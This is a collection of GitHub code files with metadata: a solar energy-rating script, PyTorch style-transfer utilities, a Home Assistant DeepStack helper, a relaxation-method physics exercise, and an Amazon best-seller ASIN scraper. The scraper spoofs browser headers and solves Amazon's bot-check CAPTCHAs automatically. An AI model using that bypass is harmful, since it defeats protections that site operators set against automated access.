alpha=alpha,\r\n tech=tech,\r\n pnom=pnom,\r\n mod_area=module_area,\r\n eta_interpolated=eta_interpolated,\r\n u0=u0,\r\n u1=u1,\r\n pv_azimuth=std_location[\"pv_azimuth\"],\r\n pv_tilt=std_location[\"pv_tilt\"],\r\n a_r=ar,\r\n spec_resp_factor=spec_resp,\r\n power_matrix= power_matrix)\r\n \r\n # Results\r\n cser.append(float(ret_df[\"cser_ER\"]))\r\n eta.append(float(ret_df[\"eta_avg_ER\"]))\r\n \r\n # Plot ETA\r\n plotting.plot_eta(df = sim_er_df,\r\n res_folder= rf'{folder}\\results\\plots',\r\n module_id = int_id,\r\n location = std_location)\r\n\r\n results_df_cser[\"cser_%s\"%(int_id)] = cser\r\n results_df_eta[\"eta_%s\"%(int_id)] = eta\r\n \r\n # Plot CSER\r\n plotting.plot_cser(df = results_df_cser,\r\n res_folder= rf'{folder}\\results\\plots',\r\n module_id = int_id)\r\n \r\n # Excel file\r\n utils.write_results(df_1 = results_df_cser,\r\n df_2 = results_df_eta,\r\n folder= rf'{folder}\\results')\r\n \r\n # Summary plot\r\n plotting.plot_summary_cser(df= results_df_cser,\r\n res_folder= rf'{folder}\\results')\r\n plotting.plot_summary_eta(df= results_df_eta,\r\n res_folder= rf'{folder}\\results')\r\n return", "repo_name": "mriveraa/ER", "sub_path": "run_main.py", "file_name": "run_main.py", "file_ext": "py", "file_size_in_byte": 6242, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "energy_rating_functions.get_eta_interpolation", "line_number": 27, "usage_type": "call"}, {"api_name": "read_functions.read_climate_locs", "line_number": 32, "usage_type": "call"}, {"api_name": "read_functions.change_names_climate_df", "line_number": 37, "usage_type": "call"}, {"api_name": "sim_steps.ersim_dc_steps", "line_number": 49, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 61, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 76, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 78, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 84, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 85, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 92, "usage_type": "call"}, {"api_name": "read_functions.read_callab_stdfile", "line_number": 98, "usage_type": "call"}, {"api_name": "read_functions.read_standard_locations", "line_number": 104, "usage_type": "call"}, {"api_name": "plotting.plot_eta", "line_number": 138, "usage_type": "call"}, {"api_name": "plotting.plot_cser", "line_number": 147, "usage_type": "call"}, {"api_name": "utils.write_results", "line_number": 152, "usage_type": "call"}, {"api_name": "plotting.plot_summary_cser", "line_number": 157, "usage_type": "call"}, {"api_name": "plotting.plot_summary_eta", "line_number": 159, "usage_type": "call"}]} +{"seq_id": "35709901926", "text": "import numpy as np\nimport torch as th\nfrom pathlib import Path\nfrom tqdm import tqdm\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms as th_trans\nfrom PIL import Image\nimport colorsys\nimport cv2 as cv\n\nmy_format = ([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n\ntrans = th_trans.Compose([th_trans.RandomCrop(256),\n th_trans.ToTensor(),\n # th_trans.Normalize(mean=my_format[0],\n # std=my_format[1])\n ])\n\n\ndef trans_rgb2yiq(images):\n if images.ndim == 3:\n images = images.unsqueeze(0)\n image_Y = 0.299 * images[:, 0] + 0.587 * images[:, 1] + 0.114 * images[:, 2]\n image_I = 0.596 * images[:, 0] - 0.274 * images[:, 1] - 0.322 * images[:, 2]\n image_Q = 0.211 * images[:, 0] - 0.522 * images[:, 1] + 0.311 * images[:, 2]\n return image_Y, image_I, image_Q\n\n\ndef trans_yiq2rgb(img_Y, img_I, img_Q):\n image_R = th.clamp(img_Y + 0.956 * img_I + 0.620 * img_Q, 0, 1)\n image_G = th.clamp(img_Y - 0.272 * img_I - 0.648 * img_Q, 0, 1)\n image_B = th.clamp(img_Y - 1.105 * img_I + 1.705 * img_Q, 0, 1)\n return th.stack([image_R, image_G, image_B], dim=1)\n\n\ndef norm(tensor):\n normalize = th_trans.Normalize(mean=my_format[0],\n std=my_format[1])\n return normalize(tensor)\n\n\ndef denorm(tensor, device):\n std = th.tensor(my_format[1]).reshape(-1, 1, 1).to(device)\n mean = th.tensor(my_format[0]).reshape(-1, 1, 1).to(device)\n res = th.clamp(tensor * std + mean, 0, 1)\n return res\n\n\ndef images_camp(images):\n b, c, h, w = images.shape\n Imax, _ = th.max(images.view(b, c, -1), dim=2)\n Imin, _ = th.min(images.view(b, c, -1), dim=2)\n out = (images - Imin.view(b, c, 1, 1)) / (Imax.view(b, c, 1, 1) - Imin.view(b, c, 1, 1))\n return out\n\n\ndef color_cov_sqrt(images):\n b, c, h, w = images.shape\n img_mean = th.mean(images, (2, 3))\n img_temp1 = images.view([b, c, 1, -1]) - img_mean.view([b, c, 1, 1])\n img_temp2 = th.matmul(img_temp1.permute(0, 3, 1, 2), img_temp1.permute(0, 3, 2, 1))\n img_cov = th.sum(img_temp2, dim=1) / (h * w)\n img_cov_sqrt = []\n for cov in img_cov:\n img_cov_eig, img_cov_eig_vector = cov.eig(eigenvectors=True)\n cov_sqrt = th.mm(th.mm(img_cov_eig_vector, th.diag_embed(th.pow(img_cov_eig[:, 0], 0.5))),\n img_cov_eig_vector.permute(1, 0))\n img_cov_sqrt.append(cov_sqrt)\n return th.stack(img_cov_sqrt)\n\n\ndef color_transfer(content, style):\n \"\"\"\n To match images`s color in Image Analogies\n If can`t, return style images originally.\n :param content: a tensor for match color, with BxCxHxW\n :param style: a tensor for style images, with BxCxHxW\n :return: a tensor with BxCxHxW\n \"\"\"\n b, c, h, w = style.shape\n content_cq = color_cov_sqrt(content)\n style_cq = color_cov_sqrt(style)\n\n _skip_list = set()\n _sample_fin = th.isfinite(th.stack([content_cq, style_cq], dim=1))\n _sample_det = style_cq.det().abs() < 1e-9\n for ib in range(b):\n if not _sample_fin[ib].all():\n _skip_list.add(ib)\n if _sample_det[ib]:\n style_cq[ib] = th.eye(3)\n _skip_list.add(ib)\n\n mat_Aia = th.bmm(content_cq, style_cq.inverse())\n vator_b = th.mean(content, (2, 3)) - th.bmm(mat_Aia, th.mean(style, (2, 3)).unsqueeze(-1)).squeeze(-1)\n\n out_images = []\n for ib in range(b):\n if ib in _skip_list:\n out_images.append(style[ib])\n else:\n out_img = (th.matmul(mat_Aia[ib], style[ib].permute(1, 2, 0).unsqueeze(-1)).squeeze(-1)\n + vator_b[ib].view(1, 1, c)).permute(2, 0, 1)\n out_images.append(out_img)\n out_images = images_camp(th.stack(out_images, dim=0))\n return out_images\n\n\ndef color_channel_cap(content_channel, style_channel):\n b, _, _ = content_channel.shape\n c_mean = th.mean(content_channel, (1, 2)).view(-1, 1, 1)\n s_mean = th.mean(style_channel, (1, 2)).view(-1, 1, 1)\n c_std = th.std(content_channel, (1, 2)).view(-1, 1, 1)\n s_std = th.std(style_channel, (1, 2)).view(b, 1, 1)\n out_style_channel = c_std / s_std * (style_channel - s_mean) + c_mean\n return out_style_channel\n\n\ndef color_transfer_reinhard(content, style):\n \"\"\"\n To match images`s color in Reinhard\n :param content: a tensor for match color\n :param style: a tensor for style images\n :return: a tensor with BxCxHxW\n \"\"\"\n content_yiq = trans_rgb2yiq(content)\n style_yiq = trans_rgb2yiq(style)\n out_yiq = []\n for c, s in zip(content_yiq, style_yiq):\n out_yiq.append(color_channel_cap(c, s))\n out_rgb = trans_yiq2rgb(out_yiq[0], out_yiq[1], out_yiq[2])\n\n return out_rgb\n\n\nclass PreprocessDataset(Dataset):\n \"\"\"\n Dataset Object with resized and transform\n \"\"\"\n\n def __init__(self, content_dir, style_dir, transforms=trans):\n \"\"\"\n Dataset initial function.\n :param content_dir: str or Path object\n :param style_dir: str or Path object\n :param transforms: torchvision`s transforms object, defualt: Compose(RandomCrop-256 + ToTensor)\n \"\"\"\n content_dir_resized = Path(content_dir) / '_resized'\n style_dir_resized = Path(style_dir) / '_resized'\n if not content_dir_resized.exists():\n content_dir_resized.mkdir()\n self._resize(content_dir, content_dir_resized)\n if not style_dir_resized.exists():\n style_dir_resized.mkdir()\n self._resize(style_dir, style_dir_resized)\n\n content_images = []\n style_images = []\n for s_img in style_dir_resized.glob('*'):\n style_images.append(s_img)\n for c_img in content_dir_resized.glob('*'):\n content_images.append(c_img)\n\n if len(style_images) * 2 < len(content_images):\n style_images = style_images * 2\n self.image_pairs = list(zip(content_images, style_images))\n self.transforms = transforms\n\n @staticmethod\n def _resize(source_dir, target_dir):\n print(f'Start resizing {source_dir} ')\n for i in tqdm(Path(source_dir).glob('*')):\n filename = i.stem + '.bmp'\n try:\n # image = io.imread(str(i))\n image = cv.imread(str(i))\n if len(image.shape) == 3 and image.shape[-1] == 3:\n H, W, _ = image.shape\n if H < W:\n ratio = W / H\n H = 512\n W = int(ratio * H)\n else:\n ratio = H / W\n W = 512\n H = int(ratio * W)\n # image = transform.resize(image, (H, W), mode='reflect', anti_aliasing=True)\n image = cv.resize(image, (W, H), interpolation=cv.INTER_CUBIC)\n # io.imsave(os.path.join(target_dir, filename), image)\n cv.imwrite(str(Path(target_dir) / filename), image)\n except:\n continue\n\n def __len__(self):\n return len(self.image_pairs)\n\n def __getitem__(self, index):\n content_img, style_img = self.image_pairs[index]\n content_img = Image.open(content_img)\n style_img = Image.open(style_img)\n\n if self.transforms:\n content_img = self.transforms(content_img)\n style_img = self.transforms(style_img)\n return content_img, style_img\n\n\ndef test01(tensor):\n tensor_yiq = trans_rgb2yiq(tensor)\n tensor_yiq_re_rgb1 = trans_yiq2rgb(0 * th.ones_like(tensor_yiq[0]), tensor_yiq[1], tensor_yiq[2])\n tensor_yiq_re_rgb2 = trans_yiq2rgb(tensor_yiq[0], th.zeros_like(tensor_yiq[1]), th.zeros_like(tensor_yiq[2]))\n\n show_tensor(tensor)\n show_tensor(tensor_yiq[0].unsqueeze(1).expand(-1, 3, -1, -1))\n show_tensor(tensor_yiq_re_rgb1)\n show_tensor(tensor_yiq_re_rgb2)\n\n\ndef test02(tensor):\n nt = norm(tensor)\n dn_nt = denorm(nt, 'cpu')\n\n print(tensor.std((1, 2)), tensor.mean((1, 2)))\n print(dn_nt.std((1, 2)), dn_nt.mean((1, 2)))\n\n print('nt:\\n', nt.std((1, 2)), nt.mean((1, 2)))\n\n\ndef test03(content, style):\n out = color_transfer(content, style)\n\n show_tensor(content)\n show_tensor(style)\n show_tensor(out)\n\n return out\n\n\nif __name__ == '__main__':\n import os\n from Source.myTools.TrainTools import show_tensor\n\n os.chdir('G:/Program/Git/My_Git/test/Grand_work/exam_01_VGG_19')\n\n img1 = Image.open('.dataset/My_dataset/test-1.bmp')\n img2 = Image.open('.dataset/My_dataset/content/lenna.jpg')\n img3 = Image.open('.dataset/My_dataset/content/golden_gate.jpg')\n img4 = Image.open('.dataset/My_dataset/style/candy.jpg')\n img5 = Image.open('.dataset/My_dataset/style/Composition-VII.jpg')\n\n t1 = trans(img1).unsqueeze(0)\n tensor_c1 = trans(img2).unsqueeze(0)\n tensor_c2 = trans(img3).unsqueeze(0)\n tensor_s1 = trans(img4).unsqueeze(0)\n tensor_s2 = trans(img5).unsqueeze(0)\n\n # test01(tensor_content)\n # test02(tensor_style)\n tensor_out = test03(tensor_c2, tensor_s1)\n", "repo_name": "linghtiin/Style_Transfer_color", "sub_path": "Source/myModels/dataset.py", "file_name": "dataset.py", "file_ext": "py", "file_size_in_byte": 9108, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torchvision.transforms.Compose", "line_number": 13, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 13, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomCrop", "line_number": 13, "usage_type": "call"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 14, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.clamp", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 33, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 37, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.min", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.diag_embed", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.pow", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.isfinite", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.eye", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.bmm", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.bmm", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.std", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.std", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.utils.data.Dataset", "line_number": 136, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 148, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 149, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 172, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 172, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 176, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 188, "usage_type": "call"}, {"api_name": "cv2.INTER_CUBIC", "line_number": 188, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 190, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 190, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 199, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 199, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 200, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 200, "usage_type": "name"}, {"api_name": "torch.ones_like", "line_number": 210, "usage_type": "call"}, {"api_name": "torch.zeros_like", "line_number": 211, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 243, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 245, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 245, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 246, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 246, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 247, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 247, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 248, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 248, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 249, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 249, "usage_type": "name"}]} +{"seq_id": "36359709088", "text": "import logging\nimport voluptuous as vol\n\nfrom homeassistant.const import (CONF_HOST, CONF_PORT, ATTR_NAME, CONF_SSL)\nfrom homeassistant.helpers import config_validation as cv\nfrom homeassistant.components.image_processing import (CONF_CONFIDENCE)\n\nfrom .const import *\n\n_LOGGER = logging.getLogger(__name__)\n\nCONFIG_SCHEMA = vol.Schema({\n DOMAIN: vol.Schema({\n vol.Required(CONF_HOST): cv.string,\n vol.Optional(CONF_SSL): cv.boolean,\n vol.Required(CONF_PORT): cv.port,\n vol.Optional(CONF_UNKNOWN_DIRECTORY): cv.string,\n vol.Optional(CONF_ADMIN_KEY, default=''): cv.string,\n vol.Optional(CONF_API_KEY, default=''): cv.string\n }),\n}, extra=vol.ALLOW_EXTRA)\n\nSERVICE_REGISTER_FACE_SCHEMA = vol.Schema({\n vol.Required(ATTR_NAME): cv.string,\n vol.Required(FILE_PATH): cv.string,\n})\n\nSERVICE_DELETE_FACE_SCHEMA = vol.Schema({\n vol.Required(ATTR_NAME): cv.string\n})\n\nSERVICE_DISPLAY_RESPONSE_TIME_SCHEMA = vol.Schema({\n vol.Required(ATTR_ENABLED): cv.boolean,\n})\n\nSERVICE_CHANGE_CONFIDENCE_LEVEL_SCHEMA = vol.Schema({\n vol.Required(CONF_CONFIDENCE): vol.All(vol.Coerce(float), vol.Range(min=0, max=100))\n})\n\n\nclass HomeAssistant:\n def __init__(self, hass, allow_backup_restore):\n self._hass = hass\n self._allow_backup_restore = allow_backup_restore\n\n def initialize(self, service_change_confidence_level, service_display_response_time,\n service_register_face, service_list_faces, service_delete_face):\n self._hass.services.register(DOMAIN, SERVICE_CHANGE_CONFIDENCE_LEVEL, service_change_confidence_level,\n schema=SERVICE_CHANGE_CONFIDENCE_LEVEL_SCHEMA)\n\n self._hass.services.register(DOMAIN, SERVICE_DISPLAY_RESPONSE_TIME, service_display_response_time,\n schema=SERVICE_DISPLAY_RESPONSE_TIME_SCHEMA)\n\n self._hass.services.register(DOMAIN, SERVICE_REGISTER_FACE, service_register_face,\n schema=SERVICE_REGISTER_FACE_SCHEMA)\n\n if self._allow_backup_restore:\n self._hass.services.register(DOMAIN, SERVICE_LIST_FACES, service_list_faces)\n self._hass.services.register(DOMAIN, SERVICE_DELETE_FACE, service_delete_face,\n schema=SERVICE_DELETE_FACE_SCHEMA)\n\n def is_valid_file_path(self, file_path):\n \"\"\"Check that a file_path points to a valid file.\"\"\"\n result = False\n\n try:\n cv.isfile(file_path)\n\n result = self._hass.config.is_allowed_path(file_path)\n except vol.Invalid:\n _LOGGER.error(f'Invalid file path: {file_path}')\n\n return result\n\n def is_valid_directory_path(self, directory_path):\n \"\"\"Check that a file_path points to a valid file.\"\"\"\n result = False\n\n try:\n cv.isdir(directory_path)\n\n result = self._hass.config.is_allowed_path(directory_path)\n except vol.Invalid:\n _LOGGER.error(f'Invalid directory path: {directory_path}')\n\n return result\n\n def fire_event(self, name, data):\n _LOGGER.info(f'Firing event: {name} with the following data: {data}')\n\n self._hass.async_add_job(self._hass.bus.async_fire, name, data)\n\n def path_builder(self, file_name):\n path = self._hass.config.path(file_name)\n\n return path\n\n def display_message(self, message):\n _LOGGER.info(f'Display message: {message}')\n\n self._hass.components.persistent_notification.create(message,\n title=NOTIFICATION_FACE_LIST,\n notification_id=NOTIFICATION_FACE_LIST)\n", "repo_name": "elad-bar/ha-deepstack", "sub_path": "custom_components/deepstack/home_assistant.py", "file_name": "home_assistant.py", "file_ext": "py", "file_size_in_byte": 3740, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "voluptuous.Schema", "line_number": 12, "usage_type": "call"}, {"api_name": "voluptuous.Schema", "line_number": 13, "usage_type": "call"}, {"api_name": "voluptuous.Required", "line_number": 14, "usage_type": "call"}, {"api_name": "homeassistant.const.CONF_HOST", "line_number": 14, "usage_type": "argument"}, {"api_name": "voluptuous.Optional", "line_number": 15, "usage_type": "call"}, {"api_name": "homeassistant.const.CONF_SSL", "line_number": 15, "usage_type": "argument"}, {"api_name": "voluptuous.Required", "line_number": 16, "usage_type": "call"}, {"api_name": "homeassistant.const.CONF_PORT", "line_number": 16, "usage_type": "argument"}, {"api_name": "voluptuous.Optional", "line_number": 17, "usage_type": "call"}, {"api_name": "voluptuous.Optional", "line_number": 18, "usage_type": "call"}, {"api_name": "voluptuous.Optional", "line_number": 19, "usage_type": "call"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 14, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 14, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.boolean", "line_number": 15, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 15, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.port", "line_number": 16, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 16, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 17, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 17, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 18, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 18, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 19, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 19, "usage_type": "name"}, {"api_name": "voluptuous.ALLOW_EXTRA", "line_number": 21, "usage_type": "attribute"}, {"api_name": "voluptuous.Schema", "line_number": 23, "usage_type": "call"}, {"api_name": "voluptuous.Required", "line_number": 24, "usage_type": "call"}, {"api_name": "homeassistant.const.ATTR_NAME", "line_number": 24, "usage_type": "argument"}, {"api_name": "voluptuous.Required", "line_number": 25, "usage_type": "call"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 24, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 24, "usage_type": "name"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 25, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 25, "usage_type": "name"}, {"api_name": "voluptuous.Schema", "line_number": 28, "usage_type": "call"}, {"api_name": "voluptuous.Required", "line_number": 29, "usage_type": "call"}, {"api_name": "homeassistant.const.ATTR_NAME", "line_number": 29, "usage_type": "argument"}, {"api_name": "homeassistant.helpers.config_validation.string", "line_number": 29, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 29, "usage_type": "name"}, {"api_name": "voluptuous.Schema", "line_number": 32, "usage_type": "call"}, {"api_name": "voluptuous.Required", "line_number": 33, "usage_type": "call"}, {"api_name": "homeassistant.helpers.config_validation.boolean", "line_number": 33, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 33, "usage_type": "name"}, {"api_name": "voluptuous.Schema", "line_number": 36, "usage_type": "call"}, {"api_name": "voluptuous.Required", "line_number": 37, "usage_type": "call"}, {"api_name": "homeassistant.components.image_processing.CONF_CONFIDENCE", "line_number": 37, "usage_type": "argument"}, {"api_name": "voluptuous.All", "line_number": 37, "usage_type": "call"}, {"api_name": "voluptuous.Coerce", "line_number": 37, "usage_type": "call"}, {"api_name": "voluptuous.Range", "line_number": 37, "usage_type": "call"}, {"api_name": "homeassistant.helpers.config_validation.isfile", "line_number": 67, "usage_type": "call"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 67, "usage_type": "name"}, {"api_name": "voluptuous.Invalid", "line_number": 70, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.config_validation.isdir", "line_number": 80, "usage_type": "call"}, {"api_name": "homeassistant.helpers.config_validation", "line_number": 80, "usage_type": "name"}, {"api_name": "voluptuous.Invalid", "line_number": 83, "usage_type": "attribute"}]} +{"seq_id": "71434918246", "text": "\"\"\"\nThis exercises asks us to use the relaxation method to find solutions to the equation:\n\nf(x) = 1 - e^(-cx)\n\nWhere c is a free parameter. Use the relaxation method to estimate f(x) while varying c. Plot the output.\n\nNote the regime change from when x = 0 to x > 0 . In physics this a phase transition called the percolation constant. In epidimeology, it is the epidemic threshold.\n\"\"\"\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\ndef relaxation(consts, accuracy):\n c = consts[0]\n \n points = 300\n cpoints = np.linspace(0, 3, points)\n fx = []\n\n for c in cpoints:\n error = 1.0\n x1 = 1.0\n while error > accuracy:\n x1, x2 = 1 - np.exp(-c * x1), x1\n error = np.abs((x1 - x2)/(1 - np.exp(-2 * x1)/2))\n fx.append(x1)\n\n plt.plot(cpoints, fx)\n plt.xlabel('c, free parameter')\n plt.ylabel('fx')\n plt.ylim(-0.1, 1.1)\n plt.title('Percolation Tranisition')\n plt.savefig('Exercises/Chapter 6/6.8 percolation_transition.png', format='png')\n plt.show()\n return fx\n\nif __name__ == '__main__':\n \n sol = relaxation(consts = [2], accuracy = 1E-6)\n ", "repo_name": "Jormogundr/Computational-Physics", "sub_path": "Exercises/Chapter 6/6.10 Relaxation Method.py", "file_name": "6.10 Relaxation Method.py", "file_ext": "py", "file_size_in_byte": 1145, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.linspace", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "32154577348", "text": "import re\nimport requests\nimport pandas as pd\nfrom time import time\n\nfrom bs4 import BeautifulSoup\n\nfrom amazoncaptcha import AmazonCaptcha\n\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\n_MAX_TRIAL_REQUESTS = 3\n\nheaders = {\n 'authority': 'www.amazon.com',\n 'dnt': '1',\n 'upgrade-insecure-requests': '1',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/87.0.4280.88 Safari/537.36',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,'\n 'image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'sec-fetch-site': 'none',\n 'sec-fetch-mode': 'navigate',\n 'sec-fetch-dest': 'document',\n 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',\n}\n\n\ndef solve_captcha(r):\n btf = BeautifulSoup(r.text)\n form = btf.find('form', attrs={'action': '/errors/validateCaptcha'})\n amzn = form.find('input', attrs={'name': 'amzn'})['value']\n img_url = form.find('img')['src']\n solution = AmazonCaptcha.fromlink(img_url).solve()\n session.get(f'https://www.amazon.com/errors/validateCaptcha?amzn={amzn}&amzn-r=%2F&field-keywords={solution}')\n\n\ndef valid_page(html_content):\n \"\"\"Check if the page is a valid result page\n (even if there is no result)\"\"\"\n if \"Sign in for the best experience\" in html_content:\n valid_page_bool = False\n elif 'Enter the characters you see below' in html_content:\n valid_page_bool = False\n elif \"The request could not be satisfied.\" in html_content:\n valid_page_bool = False\n elif \"We couldn't find that page\" in html_content:\n valid_page_bool = False\n elif \"Robot Check\" in html_content:\n valid_page_bool = False\n else:\n valid_page_bool = True\n return valid_page_bool\n\n\ndef query(url):\n for i in range(_MAX_TRIAL_REQUESTS):\n req = session.get(url)\n if not valid_page(req.text):\n if 'Enter the characters you see below' in req.text:\n solve_captcha(req)\n else:\n raise Exception('not valid page from \"SessionThread\"')\n else:\n return req\n raise Exception('not valid page from \"SessionThread\"')\n\n\ndef scrap_asins(url):\n page_one = query(url)\n page_two = query(f'{url}/ref=zg_bs_pg_2?_encoding=UTF8&pg=2')\n\n asins = []\n for page in [page_one, page_two]:\n soup = BeautifulSoup(page.text)\n asins += [re.findall(r\"\\/dp\\/[\\d\\w]{10}\", li.find_all('a')[0]['href'])[0][len('/dp/'):] for li in\n soup.findAll('li', attrs={'class': 'zg-item-immersion'}) if li.find_all('a')]\n return asins\n\n\nsession = requests.Session()\nsession.headers.update(headers)\n\nstart_time = time()\n\nxl = pd.ExcelFile('data/input categories.xlsx')\nwriter = pd.ExcelWriter(f'data/output asins.xlsx', engine='xlsxwriter')\n\ndf = xl.parse(xl.sheet_names[0], header=None)\nfor _, row in df.iterrows():\n title = row[0]\n url_link = row[1]\n data = scrap_asins(url_link)\n pd.DataFrame(data).to_excel(writer, sheet_name=title, header=False, index=False)\n\nwriter.save()\n\nprint(time() - start_time, 'seconds')\n", "repo_name": "evgenpatrushev/Amazon_work", "sub_path": "asins_by_categories.py", "file_name": "asins_by_categories.py", "file_ext": "py", "file_size_in_byte": 3151, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", 